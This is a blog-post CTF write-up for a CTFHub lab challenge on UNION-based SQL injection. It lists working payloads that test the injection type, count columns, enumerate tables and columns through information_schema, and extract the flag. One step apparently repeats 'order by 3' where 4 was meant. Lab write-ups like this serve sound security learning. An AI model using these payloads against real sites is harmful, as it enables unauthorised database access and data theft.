CTFHub_N1Book-SQL注入-1（union注入）

N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-1

writeup:

复制代码

1.确认是字符型注入
1'            #无回显
1' --+        #有回显

2.order by确认共有3列
1' order by 3 --+    #有回显
1' order by 3 --+    #无回显


2.union注入，确认显示位
-1' union select 1,2,3 --+    #回显2 3

3.获取表名：fl4g,notes
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

4.获取字段名：fllllag
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

5.获取flag
-1' union select 1,2,fllllag from fl4g --+

复制代码

最终拿到flag

posted @ 2022-03-24 08:33 zhengna 阅读(882) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

相关博文：

· CTFHub_N1Book-SQL注入-2（报错注入）

· CTFHub_2017-赛客夏令营-Web-injection（常规sql注入）

· CTFHUB 技能树 SQL 10

· [第一章 web入门]SQL注入-1

· SQL注入-1

阅读排行：
· Manus爆火，是硬核还是营销？
· 终于写完轮子一部分：tcp代理了，记录一下
· 震惊！C++程序真的从main开始吗？99%的程序员都答错了
· 别再用vector＜bool＞了！Google高级工程师：这可能是STL最大的设计失误
· 单元测试从入门到精通